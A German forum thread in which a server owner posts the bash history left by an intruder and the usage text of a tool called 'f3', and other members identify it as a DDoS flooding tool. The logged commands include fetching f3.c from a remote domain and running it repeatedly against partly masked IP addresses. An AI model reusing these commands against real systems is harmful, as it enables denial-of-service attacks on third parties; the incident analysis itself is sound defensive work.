wer kennt f3?

[malte]

hallo,

mein server wurde mal am anfang des jahres übernommen und dort wurde ein tool namens f3 rufkopiert und ausgeführt auf diverse domains. hat unheimlich viel traffic gemacht, ca 13gb in 4-5h aber sonst nix hoch oder runtergeladen. habs mir mal local aufm server @home kopiert und auf einen anderen rechner im lan getestet, konnte aber nichts feststellen.
leider ist das programm auf spanisch, unter den infos kann man sehen wer es programmiert hat und das es wohl aus kolumbien kommt, mehr infos konnte ich nicht rausfinden, auch nicht im inet. kennt es jemand oder weiss wozu es gut ist?

hier ein auszug aus der bashhistory:

Code: Select all

w
uname -a
id
w
ps -x
uname -a
w
./dario http://eine.domain.com/index.php?skin=
ps
ps -x
killall -9 f3
ps -x
w
traceroute xxx.227.180.1
./traceroute xxx.227.180.1
ls
ping xxx.242.84.2
ping xxx.2.54.89
ping xxx.2.54.89
cd /dev/shm
cd /var/tmmp
cd /var/tmp
./f3
./f3 xxx.2.54.89 65535 650000
./f3 xxx.40.230.111 95535 650000
./f3 xxx.40.230.111 65535 650000
./f3 xxx.74.97.147 65535 650000
./f3 xxx.163.186.225 65535 650000
tracerouter xxx.163.13.1
./f3
./f3 xxx.241.68.126 65535 650000
./f3 xxx.242.84.2 65535 650000
./f3 xxx.242.84.2 65535 650000
./f3 xxx.193.224.254 65535 650000
./f3 xxx.147.23.185 65535 650000
clear
./f3 xxx.0.208.94 65535 650000
./f3 xxx.242.84.2 65535 650000
./f3 xxx.242.84.4 65535 650000
free
finger
who
w
./f3 xxx.165.229.193 65535 650000
./f3 xxx.165.229.193 65535 650000
./f3 xxx.165.229.193 65535 650000
./f3 xxx.0.136.209 65535 650000
./f3 xx.10.136.209 65535 650000
./f3 xxx.242.84.2 35535 650000
ls
ls
ls
cd /tmp
cd
ls
cd
ls
cd /var/tmp
ls
./f3 xxx.252.155.2 65535 650000
./f3 xxx.174.95.130 65535 650000
cd /dev/shm
ls
cd /var/tmp
uname -a
ls
cd /tmp
ls
cd /var/tmp
ls
wget einedomain.net/f3.c
mv f3.c f3
chmod +x f3
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
./f3 xxx.199.201.70 65535 6500 &
ls
killall -9 f3
./f3 xxx.199.201.70 65535 6500 &
killall -9 f3
ps x
w
ping xxx.226.124.6
ls
./f3 xxx.199.201.70 65535 6500 &
killall -9 f3
ping xxx.223.3.133
ping xxx.242.84.2
ping xxx.241.68.12
traceroute xxx.242.84.1
ping xxx.141.76.214
ping xx.106.149.37
ping xx.106.149.37
./f3 xx.106.149.37 65535 6500
./f3 xx.106.149.37 65535 6500 &
ping xx.106.149.37
traceroute xxx.198.128.1
ping xx.106.149.37
./f3 xxx.217.63.27 65535 6500 &
ping xxx.217.63.27
kill -9 22566
ping xx.106.149.37
ps x
killall -9 f3
cd /dev/shm
./f3
cd /var/tmp
./f3
nmap

[lufthansen]

sieht böse aus .....
rootkit oder so ?
hasse den src irgendwo ?

[Joe User]

Mal abgesehen davon, dass die History entweder lückenhaft, oder gefälscht ist, ist lediglich die f3.c verwertbar. Da Du allerdings die IPs/Domains verschleierst, können wir Dir nicht weiterhelfen...

[malte]

ja war mir nich sicher ob ich die ips einfach so posten soll, ändert doch aber auch nix an der tatsache oder? den src von f3 hab ich nicht, nur noch das orginale programm.

[Joe User]

Schicke mir die unverfälschte History bitte per eMail...

[dea]

ja war mir nich sicher ob ich die ips einfach so posten soll, ändert doch aber auch nix an der tatsache oder? den src von f3 hab ich nicht, nur noch das orginale programm.

Lass' doch bitte mal file, strings, strace und ldd über das "originale Programm" drüber rutschen und poste die Ausgabe hier. Dürfte effizienter sein, als längst vergangene Warez-Server zu durchforsten ;)

Ich würde fast auf trinoo tippen ...

[Joe User]

Ich würde fast auf trinoo tippen ...

Kurze Suche per Google: Du meinst aber nicht das "DDoS-Tool"?

[malte]

ok hier ein paar infos:

ldd f3:
libc.so.6 => /lib/libc.so.6
/lib/ld-linux.so.2 => /lib/ld-linux.so.2

strings und strace hab ich grade nich drauf...

./f3:
FUDEDOR (v3.0) by bonny - PRIVATE!@#!
!AJUDA!: ./f3 -help
CREDITS: ./f3 -credits
!USAGE!: ./f3 (host/ip) (size) (loops)
(host/ip) == host do babaca a ser fudido.
(size) == bytes a serem enviados.
(loops) == tempo da fudecae/s.

./f3 -help:
!HELP! beta version.
!HELP!
!HELP! #brazil@efnet - eleet team
!HELP! + code by bonny ::: bonny@hacker.com.br

./f3 -credits:
!CREDITS! * creditos aos amigos e a quem me a judou.
!CREDITS!
!CREDITS! * none (root@suid.net) ::: Brazil
!CREDITS! packet spoof
!CREDITS!
!CREDITS! * cyclone (cyc@pop.com.br) ::: Brazil
!CREDITS! parceiro das hackadas, aprende rapido
!CREDITS!
!CREDITS! * mariana (mazinha@brasil.org) ::: Brazil
!CREDITS! minha leet girl, exclusiva :)
!CREDITS!
!CREDITS! * alcaloide (root@faggot.net) ::: Brazil
!CREDITS! super lamer, versao 3 pra pacotar ele



versteht jemand die sprache? :D

[the_postman]

scheint mir doch sehr stark nach nem ddos-tool zu riechen.

[dea]

scheint mir doch sehr stark nach nem ddos-tool zu riechen.

Wieso das denn? Es würde mich zwar nicht wundern, aber die derzeitigen Erkenntnisse lassen noch keine belastbaren Rückschlüsse zu.

strings und strace hab ich grade nich drauf...

Das ist mal richtig schade, denn ausgerechnet von den zweien erhoffte ich mir am meisten Informationen.

Ziemlich riskant, das Teil einfach auszuführen ... *puh*

Die (brasilianische) Ausgabe(n) hättest Du auch mit strings bekommen, vll. sogar noch zusätzliche wertvollere Informationen.

[outofbound]

Oehm, ich würde schon denken, dass es ein DoS- Tool ist.

a) Traffic
b) bash_history (Wenn Sie denn so stimmt), die Kommandozeile ist ziemlich verräterisch.


Gruss,

Out

[flolein]

Der Source liegt im Google-Cache.

[Joe User]

Die Domain, von welcher das f3.c geladen wurde, wurde 09/2003 von/über bol.com.br registriert und wird (derzeit) per zoneedit.com verwaltet. Zum Zeitpunkt meiner Nachforschung wurde die Domain auf einen (nicht erreichbaren) Kundenaccount bei bol.com.br weitergeleitet.

Es handelt sich IMO um eine angepasste Version des genannten DDoS-Tool.

PS: Näheres zur Arbeitsweise dieses DDoS-Tools gibt es unter:
http://staff.washington.edu/dittrich/mi ... o.analysis
http://staff.washington.edu/dittrich/misc/tfn.analysis

[Joe User]

Der Source liegt im Google-Cache.

404 -> Aber noch im Cache...

[flolein]

sag ich doch :)

[Joe User]

:oops:

[malte]

Ziemlich riskant, das Teil einfach auszuführen ... *puh*

Die (brasilianische) Ausgabe(n) hättest Du auch mit strings bekommen, vll. sogar noch zusätzliche wertvollere Informationen.

denke nicht das es riskant war, war auf ner virtuellen maschine unter vmware getestet, local.

hm vielleicht install ich dann mal strings und strace auf dem system.

[flolein]

kannst du dir sparen, der source ist ja wie gesagt problemlos per google verfügbar.

[malte]

ahso ok :)

[dea]

kannst du dir sparen, der source ist ja wie gesagt problemlos per google verfügbar.

Wenn Du mir mal mit der passenden Abfrage aushelfen könntest - die URL scheinst Du ja rausgenommen zu haben :/